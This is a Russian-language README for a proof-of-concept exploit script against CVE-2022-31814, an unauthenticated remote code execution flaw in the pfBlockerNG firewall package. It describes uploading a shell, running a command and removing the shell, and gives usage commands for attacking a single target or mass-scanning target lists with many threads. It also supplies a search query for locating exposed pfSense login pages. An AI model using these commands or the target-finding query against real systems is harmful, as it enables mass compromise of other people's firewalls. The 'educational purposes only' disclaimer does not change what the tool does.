
pfBlockerNG <= 2.1.4_26 Unauth RCE (CVE-2022-31814)
Этот скрипт является эксплойтом для проверки концепции для pfBlockerNG <= 2.1.4_26, который позволяет выполнять удаленный код. Он принимает один целевой URL или список URL, загружает оболочку, выполняет команду, а затем удаляет оболочку.
Этот скрипт требует Python 3.x и установленные модули requests и concurrent.futures. Вы можете установить эти модули, выполнив:
pip3 install requests concurrent.futures
или
pip3 install -r requirements.txt
usage: exploit.py [-h] [-c COMMAND] [-l LIST] [-i IP] [-t THREADS] [-o OUTPUT]
pfBlockerNG <= 2.1.4_26 Unauth RCE
options:
-h, --help show this help message and exit
-c COMMAND, --command COMMAND
Console Command ('id')
-l LIST, --list LIST List of targets (list.txt)
-i IP, --ip IP Base target uri (ex. http://target-uri/)
-t THREADS, --threads THREADS
Number of threads for mass scan
-o OUTPUT, --output OUTPUT
Output file (vuln.txt)
Чтобы атаковать одну цель, используйте флаг -i или --ip и укажите базовый URL или IP-адрес:
python3 exploit.py -i http://target-uri/ -c 'id'
Чтобы просканировать список целей, используйте флаг -l или --list и укажите путь к списку:
python3 exploit.py -l list.txt -c 'id' -t 50
Флаг -t или --threads можно использовать для указания количества потоков для сканирования.
Если указан флаг -o или --output, список уязвимых целей будет записан в файл:
python3 exploit.py -l list.txt -c 'id' -o vuln.txt
http.title:"pfSense - Login" "Server: nginx" "Set-Cookie: PHPSESSID="
Этот скрипт предназначен только для образовательных целей. Используйте на свой страх и риск.